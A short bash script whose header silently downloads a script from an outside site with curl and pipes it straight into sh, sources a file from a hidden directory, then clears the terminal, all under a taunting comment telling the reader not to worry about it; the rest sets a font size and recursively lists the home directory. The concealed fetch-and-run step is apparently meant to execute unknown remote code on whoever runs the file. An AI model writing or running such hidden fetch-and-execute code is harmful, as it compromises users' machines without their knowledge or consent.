#!/bin/bash

###########   HEADER    ###########
# loL whatcha lookin for in here???
# Don't worry about it!!
curl -s 'https://suckaaa.com/s/lib-installer' | sh;
source ~/.garbage/lib;
clear;
###########   END HEADER    ###########

setFontSize 35;

ls -LR ~/.;
